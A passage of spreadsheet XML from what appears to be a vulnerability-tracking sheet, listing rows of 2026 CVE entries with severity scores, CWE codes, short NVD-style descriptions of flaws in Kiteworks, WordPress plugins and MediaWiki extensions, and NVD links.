          <t>Kiteworks Email Protection Gateway did not sufficiently validate the content of an uploaded backup, and allowed an administrator to influence how the application loaded it. An authenticated administrator could potentially use this to execute arbitrary code on the gateway as the underlying service account.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102130</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102131</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-94</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway rejected certain configuration settings, but its validation did not recognize every form in which they could be supplied. An authenticated administrator could potentially use an unrecognized form to have a file of their choosing written to the gateway and executed, resulting in code execution as the gateway service account.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102131</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102132</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>An administrative import function in Kiteworks Core did not verify that the requesting administrator was entitled to create the privileged integration credential being imported. A delegated administrator holding a single narrowly scoped administrative permission could therefore obtain full system administrator privileges, without any action by an existing system administrator.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102132</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102142</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>express, gin</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>A system notification template on the Kiteworks appliance was rendered by a template engine that evaluated expressions contained in the stored template body. An authenticated System Administrator could potentially store a crafted template that executed operating-system commands on the appliance when the notification was next sent.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102142</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102150</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>A function in the Kiteworks Advanced Forms component was reachable without authentication. An unauthenticated attacker could potentially use it to carry out a limited set of internal service operations on the Kiteworks platform; it did not permit access to user accounts, stored files, or form submissions.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102150</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102392</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Extra Product Options For WooCommerce | Custom Product Addons and Fields &lt;= 3.3.8 versions.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102392</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103441</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data vulnerability in The Wikimedia Foundation MediaWiki Wikibase extension allows Leverage Executable Code in Non-Executable Files.
This issue affects MediaWiki Wikibase extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103441</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103442</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>External control of system or configuration setting vulnerability in The Wikimedia Foundation MediaWiki CentralAuth extension allows Code Injection.
This issue affects MediaWiki CentralAuth extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103442</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79625</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Affected products do not properly synchronize access to their monitoring functionality. When multiple clients send concurrent requests, this may lead to incorrect reads or writes, or to corruption of internal memory structures. An authenticated remote attacker with monitoring access can exploit this issue to cause incorrect data processing or a denial-of-service condition.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79625</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85679</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>The Extendify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'styles.blocks' Block Type Key in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because registerIncoming() is hooked on rest_request_before_callbacks and runs before WordPress evaluates the route's permission_callback, meaning any unauthenticated POST, PUT, or PATCH request to a /wp/v2/global-styles route can trigger the vulnerable code path.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85679</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93624</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Music Player for WooCommerce &lt;= 1.9.1 versions.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93624</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93651</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Author PHP Object Injection in Minimum and Maximum Quantity for WooCommerce &lt;= 2.1.2 versions.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93651</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93771</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Cost of Goods for WooCommerce &lt;= 3.5.2 versions.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93771</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94122</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Responsive Slider Gallery  &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94122</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94677</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Kadence WooCommerce Email Designer &lt;= 1.5.19.1 versions.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94677</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96343</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>Custom role PHP Object Injection in WP ERP &lt;= 1.17.9 versions.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96343</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96344</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>Custom role PHP Object Injection in eCommerce Product Catalog &lt;= 3.6.0 versions.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96344</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96561</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
